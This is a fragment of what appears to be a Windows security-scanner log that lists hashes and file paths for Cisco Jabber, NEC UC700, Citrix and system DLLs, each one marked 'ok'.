15:34:01.0081 0x04bc  [ F0F56A97174637CE196D1D483A79E41D, 4376E6A42E5687D4179C799ACDD3A185867919E4C35BFDCBCE36A35489D0D30E ] C:\Users\boylem1\AppData\Local\NEC\UC700\UC700ContactsCallLogsSearchModule.dll
15:34:01.0081 0x04bc  C:\Users\boylem1\AppData\Local\NEC\UC700\UC700ContactsCallLogsSearchModule.dll - ok
15:34:01.0083 0x04bc  [ 0516C01BBA089F2313164E7783757DC9, FFD9BE6B1431AD44B566D08472FBA430DCF53ED2F18ACC3FCE18DE293E7C948B ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libcxypmp.dll
15:34:01.0083 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libcxypmp.dll - ok
15:34:01.0085 0x04bc  [ F595F0287F17F87968904E8A3AC5E8E3, 5D98D56AE6AC8779CB3CE4B42AA3E21D19F0171692EEEC3168FB33BF01076C81 ] C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\b3011370dcbf33751d3b9dce8091c6c6\System.Runtime.Remoting.ni.dll
15:34:01.0085 0x04bc  C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\b3011370dcbf33751d3b9dce8091c6c6\System.Runtime.Remoting.ni.dll - ok
15:34:01.0087 0x04bc  [ ABD65B685AAD475F0964E728E8277699, 916648F2E8862B42FCDAE327BD0C05CA82CC73BE21BC07F2C5ED1E6089BDAAB5 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libgio-2.0-0.dll
15:34:01.0087 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libgio-2.0-0.dll - ok
15:34:01.0090 0x04bc  [ 0E97BA3F0DFD956AF39789402A18BFD4, 7A769E468A32A4EC2921551FB7CD082BAF8CCCB92D990AD92E0AC1D19DEC200D ] C:\Users\boylem1\AppData\Local\NEC\UC700\UC700PersonalDirectoryModule.dll
15:34:01.0090 0x04bc  C:\Users\boylem1\AppData\Local\NEC\UC700\UC700PersonalDirectoryModule.dll - ok
15:34:01.0092 0x04bc  [ 1598DB790793A396298825C1CA17FB47, 0B9FEB84220C1EB1DBB85C1CF0FFF163FD1050F7B00932619562DA4B3C4209D6 ] C:\Windows\Microsoft.NET\Framework\v2.0.50727\diasymreader.dll
15:34:01.0092 0x04bc  C:\Windows\Microsoft.NET\Framework\v2.0.50727\diasymreader.dll - ok
15:34:01.0095 0x04bc  [ 46CD22D9E14883D3640CE5AA294811CB, 43D17E5DB16E5CAB13C87BBD2B64CEF7A29A3196FFA251531C7D8A58884E8D73 ] C:\Users\boylem1\AppData\Local\NEC\UC700\UC700SoftPhoneInstallationModule.dll
15:34:01.0095 0x04bc  C:\Users\boylem1\AppData\Local\NEC\UC700\UC700SoftPhoneInstallationModule.dll - ok
15:34:01.0097 0x04bc  [ 89CA233D53FF5B629D6334CC9216D830, E3DA7BD4CFBA3E9FAC21CD70E004CE6FE2E69BF3788A2A234D4EFF0866DEDE46 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libgmodule-2.0-0.dll
15:34:01.0097 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libgmodule-2.0-0.dll - ok
15:34:01.0099 0x04bc  [ 1DF986105B9384208295C63F9A0DDD46, 7CD19ECFE189307DD5C31EB51E6A8100CEA506988CD21377E00FC2C765113A0A ] C:\Users\boylem1\AppData\Local\NEC\UC700\UC700OptionsModule.dll
15:34:01.0099 0x04bc  C:\Users\boylem1\AppData\Local\NEC\UC700\UC700OptionsModule.dll - ok
15:34:01.0101 0x04bc  [ 01368DF1C8E3DC9F6D6819F244E8CE6D, 4FD076BBC3E16D57D4BE0F8F34DD99A646BBF283D0B806D9765A5ABFE7C45D9E ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libglib-2.0-0.dll
15:34:01.0101 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libglib-2.0-0.dll - ok
15:34:01.0103 0x04bc  [ 2780AF474C49FA9F0392D1076458453A, 11EB85B3D9A8C0929BFCFEB1A3C092F8E9603C96922C8C9808A1F81C34ED0ABE ] C:\Users\boylem1\AppData\Local\NEC\UC700\UC700ACDModule.dll
15:34:01.0103 0x04bc  C:\Users\boylem1\AppData\Local\NEC\UC700\UC700ACDModule.dll - ok
15:34:01.0106 0x04bc  [ 1E861B30E9B1CC126F517CF3EA729A1F, 103E3C8EE9B03DFE0B8FDB590171234615FED3BECDF2E0A60A90146AA60BA158 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libgobject-2.0-0.dll
15:34:01.0106 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libgobject-2.0-0.dll - ok
15:34:01.0108 0x04bc  [ 969181A48DCCA5683B1C78DDEEDE215B, CB29745CD99A75F827C1173141BBFC68D314A44A913B3AB3CA43FE9A3D3B60A4 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libgthread-2.0-0.dll
15:34:01.0108 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libgthread-2.0-0.dll - ok
15:34:01.0110 0x04bc  [ 320EE60897779FCC2520CB8A271D8557, 7CABD662778AB732182D7E29060880F24E26E1DAB0C09EFBB660EA217FDD5085 ] C:\Program Files (x86)\Citrix\SelfServicePlugin\SelfServicePlugin.exe
15:34:01.0110 0x04bc  C:\Program Files (x86)\Citrix\SelfServicePlugin\SelfServicePlugin.exe - ok
15:34:01.0112 0x04bc  [ 09C9B433EC2D95D2EF2F7A4C55DDB2E3, D9817589AA880B6BF6BC7BC7149AC6DE19740B9F9D90DD54088098B4AD38B6C9 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libcxypme.dll
15:34:01.0112 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libcxypme.dll - ok
15:34:01.0114 0x04bc  [ 11930A7074F0553E1062DFA01430EE58, 935EC539C258832E8338EEB7D3DB805576C7FDC34A809F7DFAF80D82DEAD7C02 ] C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\b4c08872c259018b17b2801da33ac80f\System.Drawing.ni.dll
15:34:01.0115 0x04bc  C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\b4c08872c259018b17b2801da33ac80f\System.Drawing.ni.dll - ok
15:34:01.0117 0x04bc  [ BA9D34E52D3A76110F1A67567B0B3C51, CA6C837555B37E7F6BF9FEC35565A4B0F09675BD031A2D4D9909BC08F934B6AA ] C:\Program Files (x86)\Citrix\ICA Client\wfcrun32.exe
15:34:01.0117 0x04bc  C:\Program Files (x86)\Citrix\ICA Client\wfcrun32.exe - ok
15:34:01.0119 0x04bc  [ 54D8FEAEA674FC094BE4435167B2FACB, 9417622CFF48E5DF79BACCFA6DE1110666A860AB491721A1B7425F3214EA5F75 ] C:\Users\boylem1\AppData\Local\NEC\UC700\UC700CommonInfrastructure.dll
15:34:01.0119 0x04bc  C:\Users\boylem1\AppData\Local\NEC\UC700\UC700CommonInfrastructure.dll - ok
15:34:01.0121 0x04bc  [ 1EADE61A174A5984FC7CE9E31CE2968A, 1AB57DBD07A231D953B2EDBAFAA5A4C221E2663344C8B6B82596CEDB20FD9E65 ] C:\Users\boylem1\AppData\Local\NEC\UC700\Nec.Federation.dll
15:34:01.0121 0x04bc  C:\Users\boylem1\AppData\Local\NEC\UC700\Nec.Federation.dll - ok
15:34:01.0123 0x04bc  [ BF10BDC14753BF0FC25E9FE86A43DC92, B2427F896C6E517D971C73D564F374B013FB22F81D94CE3914D3A46B6E9C6870 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libpme.dll
15:34:01.0123 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libpme.dll - ok
15:34:01.0125 0x04bc  [ 479E085586590BFAEC75147796E3BFDF, 3EAA5253AFA882FE479FA879B9932664CFD87D2B1DDA61B64BDE42D0CB3CC8E9 ] C:\Users\boylem1\AppData\Local\NEC\UC700\UC700ClickToContactModule.dll
15:34:01.0125 0x04bc  C:\Users\boylem1\AppData\Local\NEC\UC700\UC700ClickToContactModule.dll - ok
15:34:01.0127 0x04bc  [ 0603B455F39AF06A231E00AAE4C91410, 54BC9A2A99A2ADA58104F38A74655A97980DD1148DE9C67089E67126DAB15F51 ] C:\Users\boylem1\AppData\Local\NEC\UC700\UC700AMSModule.dll
15:34:01.0127 0x04bc  C:\Users\boylem1\AppData\Local\NEC\UC700\UC700AMSModule.dll - ok
15:34:01.0129 0x04bc  [ 1B7524806D0270B81360C63A2FA047CB, CEEF5AA7F9E6504BCE15B72B29DBEE6430370BAA6A52F82CF4F2857568D11709 ] C:\Windows\winsxs\x86_microsoft.vc80.mfc_1fc8b3b9a1e18e3b_8.0.50727.762_none_0c178a139ee2a7ed\mfc80.dll
15:34:01.0129 0x04bc  C:\Windows\winsxs\x86_microsoft.vc80.mfc_1fc8b3b9a1e18e3b_8.0.50727.762_none_0c178a139ee2a7ed\mfc80.dll - ok
15:34:01.0131 0x04bc  [ BDD5E857413B372718059515C0BE48A8, FB217A7A850B670A4221BCB9A69F83CFDFD9B6314CCE4EDF07B721AE4D10227A ] C:\Users\boylem1\AppData\Local\NEC\UC700\IMCommon.dll
15:34:01.0132 0x04bc  C:\Users\boylem1\AppData\Local\NEC\UC700\IMCommon.dll - ok
15:34:01.0134 0x04bc  [ 4E886667DD5BC1B44E280404310443C2, 8FD8952C315E3A5871C6BA7DD12647142BFD82808C0163185CB324CA7786673A ] C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\db563d596d76daed04e9b5d25b2f4cb9\System.Windows.Forms.ni.dll
15:34:01.0134 0x04bc  C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\db563d596d76daed04e9b5d25b2f4cb9\System.Windows.Forms.ni.dll - ok
15:34:01.0136 0x04bc  [ 0715C340E8777FE7AC00CE52B30F3016, E7D8C476530CE6800F24ABEDA85D2238E2E799BCE98B279D9DA7AA3E16800A65 ] C:\Program Files (x86)\Citrix\ICA Client\ProgressNotificationCommon.dll
15:34:01.0136 0x04bc  C:\Program Files (x86)\Citrix\ICA Client\ProgressNotificationCommon.dll - ok
15:34:01.0138 0x04bc  [ AEDB286FB29A359459ACA451BB5F4ABE, AC271572AD6076E1EAC9BD3B70E257E63B5237D145A50A4265A679B288CA5D16 ] C:\Windows\assembly\NativeImages_v4.0.30319_32\UC700Applic0c75da81#\23d3f18ccd90b2d579abe266baa57073\UC700ApplicationLibrary.ni.dll
15:34:01.0138 0x04bc  C:\Windows\assembly\NativeImages_v4.0.30319_32\UC700Applic0c75da81#\23d3f18ccd90b2d579abe266baa57073\UC700ApplicationLibrary.ni.dll - ok
15:34:01.0140 0x04bc  [ E72DB4050D5F1E221892709C338FCDEC, C5AB5259653F3A40B2A922A1B65628EF13F51643718EAB5AD3FB2BECA9E784F4 ] C:\Program Files (x86)\Citrix\ICA Client\wfcwinn.dll
15:34:01.0141 0x04bc  C:\Program Files (x86)\Citrix\ICA Client\wfcwinn.dll - ok
15:34:01.0143 0x04bc  [ 032D87E8EDDBA3DE36A273907F9C6BDD, DD99234450A2AEFC22DC3CF965755823B4A4A5CC09564928E1B9283B76F809AB ] C:\Program Files (x86)\Citrix\ICA Client\acrdlg.dll
15:34:01.0143 0x04bc  C:\Program Files (x86)\Citrix\ICA Client\acrdlg.dll - ok
15:34:01.0145 0x04bc  [ 7031013D7CBEEF545F0287FA244A1E19, 6CADA62735ACD4AD199079E594079F11874E3812CBA9947D0723DA566C02F676 ] C:\Program Files (x86)\Citrix\ICA Client\statuin.dll
15:34:01.0145 0x04bc  C:\Program Files (x86)\Citrix\ICA Client\statuin.dll - ok
15:34:01.0147 0x04bc  [ 55EED6580559A1CA5DC68A9D8A523F66, 64134968A143AB2D9BBE10A0278CEA8162176D17317CDB2DBE7AE90619E1B211 ] C:\Program Files (x86)\Citrix\ICA Client\confmgr.dll
15:34:01.0147 0x04bc  C:\Program Files (x86)\Citrix\ICA Client\confmgr.dll - ok
15:34:01.0149 0x04bc  [ C86104CE3D47A8253E069301B19F8873, 463FB941BE707E44C5AB4C2E730B0C3268259A58BB2E92BDE2B260697CEAE0C7 ] C:\Program Files (x86)\Citrix\ICA Client\ctxlogging.dll
15:34:01.0149 0x04bc  C:\Program Files (x86)\Citrix\ICA Client\ctxlogging.dll - ok
15:34:01.0152 0x04bc  [ 97947D7EF0B1D5B65E2943518D79170B, A73B1C2723BB5E8F92E54E55B7807C5C548D100598DC7360595523D9C3DE37CE ] C:\Program Files (x86)\Citrix\ICA Client\icafile.dll
15:34:01.0152 0x04bc  C:\Program Files (x86)\Citrix\ICA Client\icafile.dll - ok
15:34:01.0154 0x04bc  [ 9B1C17276781BE25ED3FD44D95AA0D30, 913B0E728282000D2B900618909DAFFB0F70A3C61B22C06C644A559C58C80DB3 ] C:\Program Files (x86)\Citrix\ICA Client\RSManager.dll
15:34:01.0154 0x04bc  C:\Program Files (x86)\Citrix\ICA Client\RSManager.dll - ok
15:34:01.0156 0x04bc  [ 5D0769E70B2AC2DAAEF90C903222808D, 1EF34523515A83B026FFC974236C1A6B05AEB2DAE752D7876B26B3D730558C1F ] C:\Program Files (x86)\Citrix\ICA Client\RSMHook.dll
15:34:01.0156 0x04bc  C:\Program Files (x86)\Citrix\ICA Client\RSMHook.dll - ok
15:34:01.0158 0x04bc  [ 761CDBCFFE454D20AD3B4A688C7B9517, 586A32374CFB824489471A4E3714F4E6BF54646F71EFC9BFF94816FB916B738A ] C:\Program Files (x86)\Citrix\ICA Client\cst.dll
15:34:01.0158 0x04bc  C:\Program Files (x86)\Citrix\ICA Client\cst.dll - ok
15:34:01.0160 0x04bc  [ 28CA821606669BB9215CE010767720FA, C8A1F0D6704F8F37CF8AADDFAD511FF27E56E8BCFFD4AC948DFA0329DB1F3A1E ] C:\Windows\SysWOW64\cryptui.dll
15:34:01.0160 0x04bc  C:\Windows\SysWOW64\cryptui.dll - ok
15:34:01.0162 0x04bc  [ 9090454E6772F7CFBCE240BF4DC5F7E8, A532044DFD1FA6463516125EA74C250762DE4DACBE613F8AD2FF72D50C0B9585 ] C:\Program Files (x86)\Citrix\ICA Client\MFC80ENU.dll
15:34:01.0162 0x04bc  C:\Program Files (x86)\Citrix\ICA Client\MFC80ENU.dll - ok
15:34:01.0164 0x04bc  [ 1E8568AC729D0211B6D2EE239CF16546, 82F21303CEF6DBCA29C18BF9C132E240352BAC4BBBBA9BA883AEC09E465088D7 ] C:\Program Files (x86)\Citrix\ICA Client\resource\en\ProgressNotificationCommonUI.dll
15:34:01.0164 0x04bc  C:\Program Files (x86)\Citrix\ICA Client\resource\en\ProgressNotificationCommonUI.dll - ok
15:34:01.0166 0x04bc  [ 5C36CE9D0F6A176B7E219EAC942C13AF, 12E593FD0B85A7B04CF6DAC7C006045C0345CF13FE8E29C2F9DC7C1708FDC490 ] C:\Program Files (x86)\Citrix\ICA Client\resource\en\statuiUI.dll
15:34:01.0167 0x04bc  C:\Program Files (x86)\Citrix\ICA Client\resource\en\statuiUI.dll - ok
15:34:01.0169 0x04bc  [ 4A28EBABA26DAA6E154D9761B3743E2A, 1F267C872D09C7DD0B2DF950A66B09C54EE42BD9FBA821110BDEA6E1566531D7 ] C:\Program Files (x86)\Citrix\ICA Client\resource\en\cstUI.dll
15:34:01.0169 0x04bc  C:\Program Files (x86)\Citrix\ICA Client\resource\en\cstUI.dll - ok
15:34:01.0171 0x04bc  [ 4FA24B09A2D2DCFAF66D8F4E06B9B589, 0685B4F039690EAE310044F3983F8A36589DBA70FA78DEA265525A178425EBA1 ] C:\Program Files (x86)\Citrix\ICA Client\resource\en\wfcrunUI.dll
15:34:01.0171 0x04bc  C:\Program Files (x86)\Citrix\ICA Client\resource\en\wfcrunUI.dll - ok
15:34:01.0173 0x04bc  [ 2BA62D514C0481A5F9B72987CE0566A8, F91ED59CBA04C4619F05B4AE20C39C47B1D97AA669787A2C616A7B866E9856D2 ] C:\Users\boylem1\AppData\Local\Citrix\Receiver\WindowsAppRHelper_wfcrun32.exe.dll
15:34:01.0173 0x04bc  C:\Users\boylem1\AppData\Local\Citrix\Receiver\WindowsAppRHelper_wfcrun32.exe.dll - ok
15:34:01.0175 0x04bc  [ 402D31768D3267F59CA00C68093E2DAB, 9254F141AEAFD92A8B63C8CEDDBF6FDE8A48DE746AD1B595EA56BEFE216A8809 ] C:\Program Files (x86)\Citrix\SelfServicePlugin\DazzleConfig.dll
15:34:01.0175 0x04bc  C:\Program Files (x86)\Citrix\SelfServicePlugin\DazzleConfig.dll - ok
15:34:01.0177 0x04bc  [ 4B1144C895D7E13FD8387C65FC9653F0, 394395DF12D7C6376C3D807803D1235CB55ADB372EEDE0AA39F8C42E783C0ED3 ] C:\Program Files (x86)\Citrix\ICA Client\CCMProxy.dll
15:34:01.0177 0x04bc  C:\Program Files (x86)\Citrix\ICA Client\CCMProxy.dll - ok
15:34:01.0179 0x04bc  [ ACF4F75E7A3F3D46836808D84559ECD8, ABFCB7E2507FF8906C190CEB1675D832EBC5B8AC6F0B6EC66D995B7E8B11E421 ] C:\Program Files (x86)\Citrix\SelfServicePlugin\ReceiverShim.dll
15:34:01.0179 0x04bc  C:\Program Files (x86)\Citrix\SelfServicePlugin\ReceiverShim.dll - ok
15:34:01.0181 0x04bc  [ E227B810296AA27E6C69307A7B6456E5, 0FBF1C90362EA0D12B4B0E18A2FB3E3AC90E116C30BE4CBE95F12EB4882FB985 ] C:\Windows\SysWOW64\msxml6.dll
15:34:01.0181 0x04bc  C:\Windows\SysWOW64\msxml6.dll - ok
15:34:01.0184 0x04bc  [ CC7C7F00140C5D37209A086DA52365EC, 8AFEFBDF60B3FE47D0DD100F85A08023871B7A24BA31FC285ADC03229DBB4E88 ] C:\Users\boylem1\AppData\Local\Citrix\Receiver\WindowsAppRHelper_SelfServicePlugin.exe.dll
15:34:01.0184 0x04bc  C:\Users\boylem1\AppData\Local\Citrix\Receiver\WindowsAppRHelper_SelfServicePlugin.exe.dll - ok
15:34:01.0186 0x04bc  [ DB001FAEA818AE2E14A74E0ADC530FC0, 45CB405589C92BF74C47B7C90E299A5732A99403C51F301A5B60579CAF3116E7 ] C:\Windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\msvcp90.dll
15:34:01.0186 0x04bc  C:\Windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\msvcp90.dll - ok
15:34:01.0188 0x04bc  [ 68580AEF5F1529E493F5DE41622D0C92, 8FF4D5E018F6490EEEE002FF192AEA0A9A03C1E52E0DCC589F715A7BF43E798C ] C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\691c1ad89d16f49d80e84fa06a79089a\System.Core.ni.dll
15:34:01.0188 0x04bc  C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\691c1ad89d16f49d80e84fa06a79089a\System.Core.ni.dll - ok
15:34:01.0191 0x04bc  [ C5413BC4F10CEB4C3070BBF04D324117, 83908C79D22458BC05FAB5ABF1DDF74177B1E5C612E893C62C19C284D2C86F60 ] C:\Windows\SysWOW64\msisip.dll
15:34:01.0191 0x04bc  C:\Windows\SysWOW64\msisip.dll - ok
15:34:01.0193 0x04bc  [ 2743DF541AC43BD9EBD8E4F164DCE535, D08226CAFD6299E4E3516CA8DE065F1DD513B1EB281C97B5E6491134792EDF13 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libtaah264codecbase.dll
15:34:01.0193 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libtaah264codecbase.dll - ok
15:34:01.0195 0x04bc  [ FB99D520DEC50BACB793186DC5ED500B, 7C958740ADC73E9535C7A51723D77A077DEC370E068EADB336D60064454D6BDB ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libgstreamer-0.10-0.dll
15:34:01.0195 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libgstreamer-0.10-0.dll - ok
15:34:01.0197 0x04bc  [ 4CFEE6B3A04B2DE7463B4268C816680F, 8E011EEB57DB7E5944E9FA774E77AAC18267499738D60A568DB6C36A5C0BC336 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\logitech-vt3fix.dll
15:34:01.0197 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\logitech-vt3fix.dll - ok
15:34:01.0199 0x04bc  [ 890158EDBC35DFC15320A40B43AB148B, 0A0DF7D9D1C2EB491FB409B7BAF223C334D0E9C8D03E255911D64960AF075300 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libgstaudio-0.10-0.dll
15:34:01.0199 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libgstaudio-0.10-0.dll - ok
15:34:01.0201 0x04bc  [ 21D4DE71FF452096765D2ED8A12DEF29, 0B9658A3B9CDE564EEB45D6EBED1199B6EB960F2F241692B1158A0D574DF54F8 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libgstinterfaces-0.10-0.dll
15:34:01.0201 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libgstinterfaces-0.10-0.dll - ok
15:34:01.0203 0x04bc  [ AE6CBA8DFD5703A2FC566F9F2BC9B02D, 3872CDAFD147CEDD1E75622D3ED6839581E2ED9263669300944D6F136C118E69 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libgstpbutils-0.10-0.dll
15:34:01.0203 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libgstpbutils-0.10-0.dll - ok
15:34:01.0206 0x04bc  [ 6A5917A055B660C7C5D7FD2078E4903C, 7AEE31EBD2F5F87C8F5AC7FA472053908297621A5948DD97D0E4C956E49D5CAB ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libgstbase-0.10-0.dll
15:34:01.0206 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libgstbase-0.10-0.dll - ok
15:34:01.0208 0x04bc  [ 9D45007137AF4BC76EBA2981E682CF94, D1FE58DFE328F57BC3FFCB0CFAA0386A95A339E44F389291303DFABA27FDBB9B ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libgstvideo-0.10-0.dll
15:34:01.0208 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libgstvideo-0.10-0.dll - ok
15:34:01.0210 0x04bc  [ B3D4505CA753B0CDF74234AAB086AAEE, 674F8E7ABE99E7A5BA52D3AF8A36215B491DF42F037E49F5B9FB1D62C358153F ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libcxybase.dll
15:34:01.0210 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libcxybase.dll - ok
15:34:01.0212 0x04bc  [ B0F321C32D66A73FD3DFFB07BEEC596F, 8E8C0B297A96F83378FF023BC159F4D461B7B3724DB1A31CF953ECF3EE74C9D6 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libgstapp-0.10-0.dll
15:34:01.0212 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libgstapp-0.10-0.dll - ok
15:34:01.0215 0x04bc  [ 7700D9393EFD64EC1DAB57EA16E679DF, 99E60A7190D9C5488B90495FE4DB6CF8A3A99125588804898E2F8C30E9537BA0 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libgstrtp-0.10-0.dll
15:34:01.0215 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libgstrtp-0.10-0.dll - ok
15:34:01.0217 0x04bc  [ 7BDBE932B9426DB6C26E515E1FAD48B6, 329FD66AE93EC4AA0CF5FDD6706C018CD65442189ADC7DB7271A7F0F00A61916 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libcxytaf.dll
15:34:01.0217 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libcxytaf.dll - ok
15:34:01.0219 0x04bc  [ 1AA33AE79D2B2AF0E842782800CCA35A, AD4404DCF6075EEF57C9FA05A063D947A7A05CD429AED123622FE21D683E7A3A ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libtaf.dll
15:34:01.0219 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libtaf.dll - ok
15:34:01.0221 0x04bc  [ 26538452043F4D6CED12EF0B02BC75C8, 653260B924F172862407ADBEA59041C9DB88A8BEE1F0D5394391F8505D96716D ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\CDMWrapper.dll
15:34:01.0221 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\CDMWrapper.dll - ok
15:34:01.0223 0x04bc  [ 88EAC28752F065B4D44EA6077213777D, 8C3EE757C08A05F1261FBBF0FC1AB7358119434AF8252C8C910B8B1C045950D5 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\CommunicationsDeviceManager.dll
15:34:01.0223 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\CommunicationsDeviceManager.dll - ok
15:34:01.0225 0x04bc  [ 732177E50C7B20CDCF79A1130092F751, 694981E68948392B15FAD27633E6B5B5CA5B9BEF442BDF3AA64F49236619F1E0 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\accessories_manager.dll
15:34:01.0225 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\accessories_manager.dll - ok
15:34:01.0227 0x04bc  [ C85DFA2F308860BBB7735BF8BD434EC6, 34E96951FF6FA956DC4E6F738749DF9F14571585F62CEAB6CD92CC85DF6BCDA6 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\services\TelemetryService\TelemetryService.dll
15:34:01.0227 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\services\TelemetryService\TelemetryService.dll - ok
15:34:01.0230 0x04bc  [ 5D21425505C56EE3DBD34603ADE3F699, 45ED5515E145C1782ABD22A0474EE8983EAF28628CEA6D03219AD7F8CD6E6579 ] C:\Program Files (x86)\Citrix\SelfServicePlugin\PreLaunchConfig.dll
15:34:01.0230 0x04bc  C:\Program Files (x86)\Citrix\SelfServicePlugin\PreLaunchConfig.dll - ok
15:34:01.0232 0x04bc  [ 6FCDED8D02EA3DCA53ACF81D15C0897C, E32B6718BE163E68292B66F004416498DED3748AC4B6721470EFF40696B1E558 ] C:\Program Files (x86)\Citrix\SelfServicePlugin\BaseClassLibrary.dll
15:34:01.0232 0x04bc  C:\Program Files (x86)\Citrix\SelfServicePlugin\BaseClassLibrary.dll - ok
15:34:01.0234 0x04bc  [ 590F329BA8E9DDD7BF7161EF9043E24A, C6FFFBA234400819FD5DF986B532847AAED19C4C32078BF845808E27937B056C ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\services\IMPresenceServices\IMPresenceServices.dll
15:34:01.0234 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\services\IMPresenceServices\IMPresenceServices.dll - ok
15:34:01.0236 0x04bc  [ AA5D30751AF160CCFD66E55AC0D06F92, EE831FD677297A785479BE3B26468480C421469C5B7A3EFEFB028A93B003E9E5 ] C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.Linq\7ab3e68c2e523f60bfc4f222cbd1c1d0\System.Xml.Linq.ni.dll
15:34:01.0236 0x04bc  C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.Linq\7ab3e68c2e523f60bfc4f222cbd1c1d0\System.Xml.Linq.ni.dll - ok
15:34:01.0238 0x04bc  [ D1029EEF72DF1410FCAAE8BFDF00CC0D, 823BF7A8774C565E34FBF517D287C0F6447909FD8C380DD20B986C656B812611 ] C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\f9f13cd8fe1cefaad78579a7c3a41464\System.Runtime.Serialization.ni.dll
15:34:01.0238 0x04bc  C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\f9f13cd8fe1cefaad78579a7c3a41464\System.Runtime.Serialization.ni.dll - ok
15:34:01.0240 0x04bc  [ 0F6EB32C1B18477E082E4A62BE5A1F1C, 5DB63C0DFCA88E257E8FE81F2F2C8FC5136FDB066FEBA4E0B749564E1A65A626 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\JabberWerxCPP.dll
15:34:01.0240 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\JabberWerxCPP.dll - ok
15:34:01.0243 0x04bc  [ D2850F32F3C7189A864CD90B304CA790, 1A90717BBC5DB7EC1CD53C4FF5CD119547A2FD6741CEF28AD19E3F7E0A441504 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\contrace.dll
15:34:01.0243 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\contrace.dll - ok
15:34:01.0245 0x04bc  [ 1AC787C20C7F89A428C5F01030FA9D64, 7026F85BAF8D557886AD4E8EBAC65B387848DD9C22ACF4AC51F59FC20EDF586F ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\at_dll.dll
15:34:01.0245 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\at_dll.dll - ok
15:34:01.0247 0x04bc  [ E044D551987A19A123A12FDF4775333C, 55569389FC4512835B58D6E941E139F859451D23BC9A102A0D9A5EBF439347B1 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\csfcommunicationhistory.dll
15:34:01.0247 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\csfcommunicationhistory.dll - ok
15:34:01.0249 0x04bc  [ D205C24A9D069049FE2DF2A1B38726A7, B98F420B57A34FDA24F9A655319245EEF86EF4A952014FFA018070A01D5CBC4C ] C:\Windows\SysWOW64\wdmaud.drv
15:34:01.0249 0x04bc  C:\Windows\SysWOW64\wdmaud.drv - ok
